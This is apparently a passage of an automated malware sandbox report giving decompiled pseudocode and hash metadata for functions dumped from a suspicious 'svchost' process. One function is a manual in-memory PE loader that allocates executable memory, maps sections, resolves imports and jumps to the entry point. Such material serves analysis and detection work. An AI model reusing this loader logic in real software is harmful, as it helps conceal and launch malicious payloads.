                                                                                                                                                                                                                                                                            						_t22 = LoadLibraryExA(_t23 + _a4, 0, 0);
                                                                                                                                                                                                                                                                            						if(_t22 != 0) {
                                                                                                                                                                                                                                                                            							_v8 = _t22;
                                                                                                                                                                                                                                                                            							if( *_t34 == 0) {
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                                                                            								asm("lodsd");
                                                                                                                                                                                                                                                                            								if(_t22 == 0) {
                                                                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								if((_t22 & 0x80000000) != 0) {
                                                                                                                                                                                                                                                                            									_t26 = _t22 & 0x0000ffff;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_t26 = _t22 + _a4 + 2;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t22 =  *((intOrPtr*)(_a8 + 0x29af9))(_v8, _t26);
                                                                                                                                                                                                                                                                            								asm("stosd");
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t34 = _t34 + 0x14;
                                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t22 = 1;
                                                                                                                                                                                                                                                                            					_a16 = 1;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				L14:
                                                                                                                                                                                                                                                                            				asm("popad");
                                                                                                                                                                                                                                                                            				return _t22;
                                                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                                                            0x004011d3
                                                                                                                                                                                                                                                                            0x004011e0
                                                                                                                                                                                                                                                                            0x004011e4
                                                                                                                                                                                                                                                                            0x004011e6
                                                                                                                                                                                                                                                                            0x004011e9
                                                                                                                                                                                                                                                                            0x004011ea
                                                                                                                                                                                                                                                                            0x004011ea
                                                                                                                                                                                                                                                                            0x004011ef
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x004011fc
                                                                                                                                                                                                                                                                            0x00401204
                                                                                                                                                                                                                                                                            0x00401206
                                                                                                                                                                                                                                                                            0x0040120d
                                                                                                                                                                                                                                                                            0x0040120d
                                                                                                                                                                                                                                                                            0x0040121b
                                                                                                                                                                                                                                                                            0x0040121b
                                                                                                                                                                                                                                                                            0x0040121f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0040122b
                                                                                                                                                                                                                                                                            0x00401235
                                                                                                                                                                                                                                                                            0x0040122d
                                                                                                                                                                                                                                                                            0x00401230
                                                                                                                                                                                                                                                                            0x00401230
                                                                                                                                                                                                                                                                            0x00401241
                                                                                                                                                                                                                                                                            0x00401247
                                                                                                                                                                                                                                                                            0x00401247
                                                                                                                                                                                                                                                                            0x00401221
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00401221
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00401204
                                                                                                                                                                                                                                                                            0x0040124a
                                                                                                                                                                                                                                                                            0x0040124f
                                                                                                                                                                                                                                                                            0x0040124f
                                                                                                                                                                                                                                                                            0x00401253
                                                                                                                                                                                                                                                                            0x00401253
                                                                                                                                                                                                                                                                            0x00401255

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 004011FC
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.811523812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1d8c67a6fd8a031ce9178923ff6fa604b01da3edc277bbd736844eb450087ab7
                                                                                                                                                                                                                                                                            • Instruction ID: 35013e2e2bdfb2c25cf3a4b33a37da36620c85c937569e224cb1d264aff8bf43
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d8c67a6fd8a031ce9178923ff6fa604b01da3edc277bbd736844eb450087ab7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5114872944205AFDF10CF44C8C0B9A37A4AF15354F2981B9EC19FB3A2D374EE148B99
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 30%
                                                                                                                                                                                                                                                                            			E00401126(void* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                                                                            				void* _t55;
                                                                                                                                                                                                                                                                            				void* _t57;
                                                                                                                                                                                                                                                                            				void* _t61;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				asm("pushad");
                                                                                                                                                                                                                                                                            				_t55 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
                                                                                                                                                                                                                                                                            				_t27 = VirtualAlloc( *(_t55 + 0x34),  *(_t55 + 0x50), 0x3000, 0x40);
                                                                                                                                                                                                                                                                            				if(_t27 != 0) {
                                                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                                                            					_v8 = _t27;
                                                                                                                                                                                                                                                                            					asm("cld");
                                                                                                                                                                                                                                                                            					memcpy(_v8, _a4,  *(_t55 + 0x54));
                                                                                                                                                                                                                                                                            					_t57 = _t55;
                                                                                                                                                                                                                                                                            					_push(_t57);
                                                                                                                                                                                                                                                                            					_t58 = _t57 + 0xf8;
                                                                                                                                                                                                                                                                            					asm("pushad");
                                                                                                                                                                                                                                                                            					asm("cld");
                                                                                                                                                                                                                                                                            					memcpy(_v8 +  *((intOrPtr*)(_t57 + 0x104)), _a4 +  *((intOrPtr*)(_t57 + 0x10c)),  *(_t58 + 0x10));
                                                                                                                                                                                                                                                                            					asm("popad");
                                                                                                                                                                                                                                                                            					asm("loop 0xffffffe5");
                                                                                                                                                                                                                                                                            					_pop(_t61);
                                                                                                                                                                                                                                                                            					E004011CD(_v8, _a8); // executed
                                                                                                                                                                                                                                                                            					E00401258();
                                                                                                                                                                                                                                                                            					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t61 + 0x28)) + _v8))(_v8); // executed
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t27 =  *((intOrPtr*)(_a8 + 0x29afd))(0,  *(_t55 + 0x50), 0x3000, 0x40);
                                                                                                                                                                                                                                                                            					if(_t27 != 0) {
                                                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				asm("popad");
                                                                                                                                                                                                                                                                            				return _t37;
                                                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                                                            0x0040112c
                                                                                                                                                                                                                                                                            0x00401130
                                                                                                                                                                                                                                                                            0x00401144
                                                                                                                                                                                                                                                                            0x0040114c
                                                                                                                                                                                                                                                                            0x0040116b
                                                                                                                                                                                                                                                                            0x0040116b
                                                                                                                                                                                                                                                                            0x0040116e
                                                                                                                                                                                                                                                                            0x0040117b
                                                                                                                                                                                                                                                                            0x0040117d
                                                                                                                                                                                                                                                                            0x0040117e
                                                                                                                                                                                                                                                                            0x00401185
                                                                                                                                                                                                                                                                            0x00401197
                                                                                                                                                                                                                                                                            0x0040119f
                                                                                                                                                                                                                                                                            0x004011a0
                                                                                                                                                                                                                                                                            0x004011a2
                                                                                                                                                                                                                                                                            0x004011a6
                                                                                                                                                                                                                                                                            0x004011a8
                                                                                                                                                                                                                                                                            0x004011af
                                                                                                                                                                                                                                                                            0x004011b7
                                                                                                                                                                                                                                                                            0x004011c6
                                                                                                                                                                                                                                                                            0x0040114e
                                                                                                                                                                                                                                                                            0x00401163
                                                                                                                                                                                                                                                                            0x00401167
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00401169
                                                                                                                                                                                                                                                                            0x00401167
                                                                                                                                                                                                                                                                            0x004011c8
                                                                                                                                                                                                                                                                            0x004011ca

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 00401144
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.811523812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                            • Opcode ID: f46dcd975488781c9cddb351eca70577c1689cc1756a23961b888947e9d6707a
                                                                                                                                                                                                                                                                            • Instruction ID: 6f389262607e94f6ca6fd2432eff30f66c048e0178ed9f8f27be01fdfe11bbb9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f46dcd975488781c9cddb351eca70577c1689cc1756a23961b888947e9d6707a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02115E32600615ABCB21DF64CD81B8BB7F4AF09324F144469AA1ABB691D771FA00DB88
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E04016CD0(void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = _a8;
                                                                                                                                                                                                                                                                            				_v12 = _a12;
                                                                                                                                                                                                                                                                            				_t117 = _v12;
                                                                                                                                                                                                                                                                            				E04007010(__edi, _v8, 0, _v12);
                                                                                                                                                                                                                                                                            				if(_a4 != 1) {
                                                                                                                                                                                                                                                                            					if(_a4 != 0) {
                                                                                                                                                                                                                                                                            						if(_a4 != 2) {
                                                                                                                                                                                                                                                                            							if(_a4 != 3) {
                                                                                                                                                                                                                                                                            								if(_a4 != 4) {
                                                                                                                                                                                                                                                                            									if(_a4 != 5) {
                                                                                                                                                                                                                                                                            										if(_a4 != 6) {
                                                                                                                                                                                                                                                                            											if(_a4 != 7) {
                                                                                                                                                                                                                                                                            												if(_a4 != 8) {
                                                                                                                                                                                                                                                                            													if(_a4 != 0x10) {
                                                                                                                                                                                                                                                                            														if(_a4 != 9) {
                                                                                                                                                                                                                                                                            															if(_a4 != 0xa) {
                                                                                                                                                                                                                                                                            																if(_a4 != 0xb) {
                                                                                                                                                                                                                                                                            																	if(_a4 != 0xc) {
                                                                                                                                                                                                                                                                            																		if(_a4 != 0xd) {
                                                                                                                                                                                                                                                                            																			if(_a4 != 0xe) {
                                                                                                                                                                                                                                                                            																				if(_a4 != 0xf) {
                                                                                                                                                                                                                                                                            																					if(_a4 != 0x12) {
                                                                                                                                                                                                                                                                            																						if(_a4 != 0x11) {
                                                                                                                                                                                                                                                                            																							return E04008B48(_t117, _v8, _v12, 0x4273f8);
                                                                                                                                                                                                                                                                            																						}
                                                                                                                                                                                                                                                                            																						return E04008B48(_v8, _v8, _v12, 0x4273f0);
                                                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                                                            																					return E04008B48(_v12, _v8, _v12, 0x4273e8);
                                                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                                                            																				return E04008B48(_t117, _v8, _v12, 0x4273d8);
                                                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                                                            																			return E04008B48(_v8, _v8, _v12, 0x4273c8);
                                                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                                                            																		return E04008B48(_v12, _v8, _v12, 0x4273b4);
                                                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                                                            																	return E04008B48(_t117, _v8, _v12, 0x42739c);
                                                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                                                            																return E04008B48(_v8, _v8, _v12, 0x427384);
                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                            															return E04008B48(_v12, _v8, _v12, 0x427374);
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            														return E04008B48(_t117, _v8, _v12, 0x42736c);
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            													return E04008B48(_v8, _v8, _v12, 0x427360);
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            												return E04008B48(_v12, _v8, _v12, 0x427358);
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											return E04008B48(_t117, _v8, _v12, 0x42734c);
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										return E04008B48(_v8, _v8, _v12, 0x427344);
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									return E04008B48(_v12, _v8, _v12, 0x427338);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								return E04008B48(_t117, _v8, _v12, 0x427328);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							return E04008B48(_v8, _v8, _v12, 0x42731c);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						return E04008B48(_v12, _v8, _v12, 0x427310);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					return E04008B48(_t117, _v8, _v12, 0x427300);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return E04008B48(_v8, _v8, _v12, 0x4272f4);
                                                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                                                            0x04016cd9
                                                                                                                                                                                                                                                                            0x04016cdf
                                                                                                                                                                                                                                                                            0x04016ce2
                                                                                                                                                                                                                                                                            0x04016cec
                                                                                                                                                                                                                                                                            0x04016cf8
                                                                                                                                                                                                                                                                            0x04016d18
                                                                                                                                                                                                                                                                            0x04016d38
                                                                                                                                                                                                                                                                            0x04016d58
                                                                                                                                                                                                                                                                            0x04016d78
                                                                                                                                                                                                                                                                            0x04016d98
                                                                                                                                                                                                                                                                            0x04016db8
                                                                                                                                                                                                                                                                            0x04016dd8
                                                                                                                                                                                                                                                                            0x04016df8
                                                                                                                                                                                                                                                                            0x04016e18
                                                                                                                                                                                                                                                                            0x04016e38
                                                                                                                                                                                                                                                                            0x04016e58
                                                                                                                                                                                                                                                                            0x04016e78
                                                                                                                                                                                                                                                                            0x04016e98
                                                                                                                                                                                                                                                                            0x04016eb8
                                                                                                                                                                                                                                                                            0x04016ed8
                                                                                                                                                                                                                                                                            0x04016ef5
                                                                                                                                                                                                                                                                            0x04016f12
                                                                                                                                                                                                                                                                            0x04016f2f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04016f5a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04016f43
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04016f26
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04016f09
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04016eec
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04016ecc
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04016eac
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04016e8c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04016e6c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04016e4c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04016e2c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04016e0c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04016dec
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04016dcc
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04016dac
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04016d8c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04016d6c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04016d4c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04016d2c
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _strcpy_s$_memset
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 987253425-0
                                                                                                                                                                                                                                                                            • Opcode ID: 44218adf272bf707b1ed20d16bc8d9ad3aaffc81e79ba637950d93952a6c6a75
                                                                                                                                                                                                                                                                            • Instruction ID: 6ffbbe254bd13291fa03b93f874eca1d4a54b98d90e1905f46e8f856855b0833
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44218adf272bf707b1ed20d16bc8d9ad3aaffc81e79ba637950d93952a6c6a75
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC7172B6E04208FBDF50DF94EC818DEB7B4AB4A609F20C459F90976290D135BA48EB56
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                                                            			E040137A0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				short _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                                                            				char _v30;
                                                                                                                                                                                                                                                                            				short _v32;
                                                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                                                            				char _v40;
                                                                                                                                                                                                                                                                            				short _v44;
                                                                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                                                                                                                            				char _v74;
                                                                                                                                                                                                                                                                            				short _v76;
                                                                                                                                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                                                                                                                                            				intOrPtr _v84;
                                                                                                                                                                                                                                                                            				char _v88;
                                                                                                                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                                                                                                                            				char _v96;
                                                                                                                                                                                                                                                                            				intOrPtr _v100;
                                                                                                                                                                                                                                                                            				intOrPtr _v104;
                                                                                                                                                                                                                                                                            				intOrPtr _v108;
                                                                                                                                                                                                                                                                            				intOrPtr _v112;
                                                                                                                                                                                                                                                                            				intOrPtr _v116;
                                                                                                                                                                                                                                                                            				intOrPtr _v120;
                                                                                                                                                                                                                                                                            				intOrPtr _v124;
                                                                                                                                                                                                                                                                            				intOrPtr _v128;
                                                                                                                                                                                                                                                                            				intOrPtr _v132;
                                                                                                                                                                                                                                                                            				intOrPtr _v136;
                                                                                                                                                                                                                                                                            				intOrPtr _v140;
                                                                                                                                                                                                                                                                            				intOrPtr _v144;
                                                                                                                                                                                                                                                                            				intOrPtr* _v148;
                                                                                                                                                                                                                                                                            				intOrPtr _v152;
                                                                                                                                                                                                                                                                            				intOrPtr _v156;
                                                                                                                                                                                                                                                                            				intOrPtr _v160;
                                                                                                                                                                                                                                                                            				intOrPtr _v164;
                                                                                                                                                                                                                                                                            				void* _t211;
                                                                                                                                                                                                                                                                            				void* _t213;
                                                                                                                                                                                                                                                                            				void* _t215;
                                                                                                                                                                                                                                                                            				signed int _t220;
                                                                                                                                                                                                                                                                            				intOrPtr _t226;
                                                                                                                                                                                                                                                                            				intOrPtr _t228;
                                                                                                                                                                                                                                                                            				intOrPtr _t251;
                                                                                                                                                                                                                                                                            				void* _t253;
                                                                                                                                                                                                                                                                            				intOrPtr _t258;
                                                                                                                                                                                                                                                                            				void* _t261;
                                                                                                                                                                                                                                                                            				intOrPtr _t266;
                                                                                                                                                                                                                                                                            				void* _t269;
                                                                                                                                                                                                                                                                            				signed int _t275;
                                                                                                                                                                                                                                                                            				void* _t277;
                                                                                                                                                                                                                                                                            				intOrPtr _t370;
                                                                                                                                                                                                                                                                            				void* _t373;
                                                                                                                                                                                                                                                                            				void* _t374;
                                                                                                                                                                                                                                                                            				signed int _t375;
                                                                                                                                                                                                                                                                            				void* _t376;
                                                                                                                                                                                                                                                                            				void* _t377;
                                                                                                                                                                                                                                                                            				void* _t378;
                                                                                                                                                                                                                                                                            				void* _t379;
                                                                                                                                                                                                                                                                            				void* _t380;
                                                                                                                                                                                                                                                                            				void* _t382;
                                                                                                                                                                                                                                                                            				void* _t384;
                                                                                                                                                                                                                                                                            				void* _t385;
                                                                                                                                                                                                                                                                            				void* _t386;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t374 = __esi;
                                                                                                                                                                                                                                                                            				_t373 = __edi;
                                                                                                                                                                                                                                                                            				_t277 = __ebx;
                                                                                                                                                                                                                                                                            				_v16 =  *0x429024 ^ _t375;
                                                                                                                                                                                                                                                                            				_v148 = __ecx;
                                                                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                                                                            				_v8 = 0x48;
                                                                                                                                                                                                                                                                            				_v48 =  *0x426ec4;
                                                                                                                                                                                                                                                                            				_v44 =  *0x426ec8;
                                                                                                                                                                                                                                                                            				_v28 =  *0x426ecc;
                                                                                                                                                                                                                                                                            				_v24 =  *0x426ed0;
                                                                                                                                                                                                                                                                            				_v20 =  *0x426ed4;
                                                                                                                                                                                                                                                                            				_v40 =  *0x426ed8;
                                                                                                                                                                                                                                                                            				_v36 =  *0x426edc;
                                                                                                                                                                                                                                                                            				_v32 =  *0x426ee0;
                                                                                                                                                                                                                                                                            				_v30 =  *0x426ee2;
                                                                                                                                                                                                                                                                            				while(_a4 != 0) {
                                                                                                                                                                                                                                                                            					_v52 =  *((intOrPtr*)(_v148 + 0x10));
                                                                                                                                                                                                                                                                            					if(_v52 < 0) {
                                                                                                                                                                                                                                                                            						_v52 = 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)( *_v148 + 0x2c)) > _v52) {
                                                                                                                                                                                                                                                                            						_v60 = 0xffffffff;
                                                                                                                                                                                                                                                                            						_v56 = 0;
                                                                                                                                                                                                                                                                            						_v56 = 0;
                                                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                                                            							_t334 = _v56;
                                                                                                                                                                                                                                                                            							if(_v56 >=  *((intOrPtr*)( *_v148 + 0x2c))) {
                                                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t370 =  *((intOrPtr*)( *_v148 + 0x28));
                                                                                                                                                                                                                                                                            							_t275 = _v56;
                                                                                                                                                                                                                                                                            							_t334 =  *((intOrPtr*)( *((intOrPtr*)(_t370 + _t275 * 4))));
                                                                                                                                                                                                                                                                            							if( *((intOrPtr*)( *((intOrPtr*)(_t370 + _t275 * 4)))) != _v52) {
                                                                                                                                                                                                                                                                            								_v56 = _v56 + 1;
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v60 = _v56;
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if(_v60 >= 0) {
                                                                                                                                                                                                                                                                            							_t211 = E0401E5C0( *((intOrPtr*)(_a4 + 4)),  &_v48, 1);
                                                                                                                                                                                                                                                                            							_t377 = _t376 + 0xc;
                                                                                                                                                                                                                                                                            							if(_t211 == 0) {
                                                                                                                                                                                                                                                                            								_t213 = E0401E5C0( *((intOrPtr*)(_a4 + 4)),  &_v28, 1);
                                                                                                                                                                                                                                                                            								_t378 = _t377 + 0xc;
                                                                                                                                                                                                                                                                            								if(_t213 == 0) {
                                                                                                                                                                                                                                                                            									_t215 = E0401E5C0( *((intOrPtr*)(_a4 + 4)),  &_v40, 1);
                                                                                                                                                                                                                                                                            									_t379 = _t378 + 0xc;
                                                                                                                                                                                                                                                                            									if(_t215 == 0) {
                                                                                                                                                                                                                                                                            										_v96 = 0;
                                                                                                                                                                                                                                                                            										_t220 = E0401EA00(_t373,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x28)) + _v60 * 4)) + 0x10)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x28)) + _v60 * 4)) + 0x14)),  &_v96);
                                                                                                                                                                                                                                                                            										_t376 = _t379 + 0xc;
                                                                                                                                                                                                                                                                            										_v92 = _t220;
                                                                                                                                                                                                                                                                            										if(_v96 == 0 || _v92 <= 0) {
                                                                                                                                                                                                                                                                            											L49:
                                                                                                                                                                                                                                                                            											_t334 = 0;
                                                                                                                                                                                                                                                                            											if(0 != 0) {
                                                                                                                                                                                                                                                                            												continue;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											goto L50;
                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                            											asm("cdq");
                                                                                                                                                                                                                                                                            											_v100 = _v92 + _v92 / 0x48 * 2;
                                                                                                                                                                                                                                                                            											_t226 = E04020CE0(_v100);
                                                                                                                                                                                                                                                                            											_t380 = _t376 + 4;
                                                                                                                                                                                                                                                                            											_v132 = _t226;
                                                                                                                                                                                                                                                                            											_v104 = _v132;
                                                                                                                                                                                                                                                                            											_v56 = 0;
                                                                                                                                                                                                                                                                            											_v108 = 0;
                                                                                                                                                                                                                                                                            											while(_v56 < _v92) {
                                                                                                                                                                                                                                                                            												if(_v56 > 0) {
                                                                                                                                                                                                                                                                            													asm("cdq");
                                                                                                                                                                                                                                                                            													if(_v56 % 0x48 == 0) {
                                                                                                                                                                                                                                                                            														 *((char*)(_v104 + _v108)) = 0xd;
                                                                                                                                                                                                                                                                            														 *((char*)(_v104 + _v108 + 1)) = 0xa;
                                                                                                                                                                                                                                                                            														_v108 = _v108 + 2;
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            												 *((char*)(_v104 + _v108)) =  *((intOrPtr*)(_v96 + _v56));
                                                                                                                                                                                                                                                                            												_v56 = _v56 + 1;
                                                                                                                                                                                                                                                                            												_v108 = _v108 + 1;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											_t228 = E04020CE0(8);
                                                                                                                                                                                                                                                                            											_t376 = _t380 + 4;
                                                                                                                                                                                                                                                                            											_v136 = _t228;
                                                                                                                                                                                                                                                                            											if(_v136 == 0) {
                                                                                                                                                                                                                                                                            												_v164 = 0;
                                                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                                                            												_v164 = E0401F4E0(_v136);
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											_v12 = _v164;
                                                                                                                                                                                                                                                                            											E0401FC90(_t277, _v12, _t373, _t374, _v104, _v100);
                                                                                                                                                                                                                                                                            											if(_v104 != 0) {
                                                                                                                                                                                                                                                                            												_v140 = _v104;
                                                                                                                                                                                                                                                                            												E04020CC0(_v140);
                                                                                                                                                                                                                                                                            												_t376 = _t376 + 4;
                                                                                                                                                                                                                                                                            												_v104 = 0x666;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											if(_v96 != 0) {
                                                                                                                                                                                                                                                                            												_v144 = _v96;
                                                                                                                                                                                                                                                                            												E04020CC0(_v144);
                                                                                                                                                                                                                                                                            												_t376 = _t376 + 4;
                                                                                                                                                                                                                                                                            												_v96 = 0x666;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											goto L49;
